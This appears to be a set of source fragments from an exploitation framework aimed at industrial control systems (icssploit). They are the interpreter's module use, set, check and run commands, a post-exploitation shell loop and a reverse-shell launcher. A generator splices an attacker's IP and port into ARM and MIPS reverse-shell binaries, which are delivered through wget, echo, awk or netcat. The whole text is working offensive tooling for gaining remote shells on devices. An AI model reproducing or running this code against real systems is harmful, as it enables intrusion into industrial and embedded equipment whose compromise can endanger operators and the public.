def shell(exploit, architecture="", method="", **params): while 1: while not printer_queue.empty(): pass cmd = raw_input("cmd > ") if cmd in ["quit", "exit"]: return c = cmd.split() if len(c) and c[0] == "reverse_tcp": if len(c) == 3: lhost = c[1] lport = c[2] revshell = reverse_shell(exploit, architecture, lhost, lport) if method == "wget": revshell.wget(binary=params['binary'], location=params['location']) elif method == "echo": revshell.echo(binary=params['binary'], location=params['location']) elif method == "awk": revshell.awk(binary=params['binary']) elif method == "netcat": revshell.netcat(binary=params['binary'], shell=params['shell']) else: print_error("Reverse shell is not available") else: print_error("reverse_tcp <reverse ip> <port>") else: print_info(exploit.execute(cmd))
def command_show(self, *args, **kwargs): sub_command = args[0] try: getattr(self, "_show_{}".format(sub_command))(*args, **kwargs) except AttributeError: utils.print_error("Unknown 'show' sub-command '{}'. " "What do you want to show?\n" "Possible choices are: {}".format(sub_command, self.show_sub_commands))
def command_run(self, *args, **kwargs): utils.print_status("Running module...") try: self.current_module.run() except KeyboardInterrupt: utils.print_info() utils.print_error("Operation cancelled by user") except: utils.print_error(traceback.format_exc(sys.exc_info()))
def command_unsetg(self, *args, **kwargs): key, _, value = args[0].partition(' ') try: del GLOBAL_OPTS[key] except KeyError: utils.print_error("You can't unset global option '{}'.\n" "Available global options: {}".format(key, GLOBAL_OPTS.keys())) else: utils.print_success({key: value})
def command_use(self, module_path, *args, **kwargs): if module_path.startswith("extra_"): module_path = utils.pythonize_path(module_path) else: module_path = utils.pythonize_path(module_path) module_path = '.'.join(('icssploit', 'modules', module_path)) try: self.current_module = utils.import_exploit(module_path)() except icssploitException as err: utils.print_error(err.message)
def command_set(self, *args, **kwargs): key, _, value = args[0].partition(' ') if key in self.current_module.options: setattr(self.current_module, key, value) if kwargs.get("glob", False): GLOBAL_OPTS[key] = value utils.print_success({key: value}) else: utils.print_error("You can't set option '{}'.\n" "Available options: {}".format(key, self.current_module.options))
def command_check(self, *args, **kwargs): try: result = self.current_module.check() except Exception as error: utils.print_error(error) else: if result is True: utils.print_success("Target is vulnerable") elif result is False: utils.print_error("Target is not vulnerable") else: utils.print_status("Target could not be verified")
def command_search(self, *args, **kwargs): keyword = args[0] if not keyword: utils.print_error( "Please specify search keyword. e.g. 'search plc'") return for module in self.modules: if keyword.lower() in module.lower(): module = utils.humanize_path(module) utils.print_info( "{}\033[31m{}\033[0m{}".format(*module.partition(keyword)))
def generate_binary(self, lhost, lport): print_status("Generating reverse shell binary") self.binary_name = random_text(8) ip = self.convert_ip(lhost) port = self.convert_port(lport) if self.arch == 'arm': self.revshell = self.arm[:0x104] + ip + self.arm[ 0x108:0x10a] + port + self.arm[0x10c:] elif self.arch == 'mipsel': self.revshell = self.mipsel[:0xe4] + port + self.mipsel[ 0xe6:0xf0] + ip[2:] + self.mipsel[ 0xf2:0xf4] + ip[:2] + self.mipsel[0xf6:] elif self.arch == 'mips': self.revshell = self.mips[:0xea] + port + self.mips[ 0xec:0xf2] + ip[:2] + self.mips[0xf4:0xf6] + ip[ 2:] + self.mips[0xf8:] else: print_error("Platform not supported")
def start(self): """ icssploit main entry point. Starting interpreter loop. """ utils.print_info(self.banner) printer_queue.join() while True: try: command, args = self.parse_line(raw_input(self.prompt)) if not command: continue command_handler = self.get_command_handler(command) command_handler(args) except icssploitException as err: utils.print_error(err) except EOFError: utils.print_info() utils.print_status("icssploit stopped") break except KeyboardInterrupt: utils.print_info() finally: printer_queue.join()